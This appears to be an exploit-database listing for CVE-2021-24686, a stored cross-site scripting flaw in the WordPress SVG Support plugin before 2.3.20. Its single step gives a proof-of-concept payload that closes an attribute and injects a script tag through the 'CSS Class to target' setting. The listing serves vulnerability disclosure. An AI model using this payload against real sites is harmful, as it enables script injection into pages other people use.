Exploit for SVG Support < 2.3.20 - Admin+ Stored Cross-Site Scripting CVE-2021-24686

Name: Exploit for SVG Support < 2.3.20 - Admin+ Stored Cross-Site Scripting CVE-2021-24686
Rating: 5 (195 reviews)

2022-01-03 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:38018695-901D-48D9-B39A-7C00DF7F0A4B
With the Advanced Mode enabled, put the following payload in the "CSS Class to target" setting: "><script>alert(/XSS/)</script>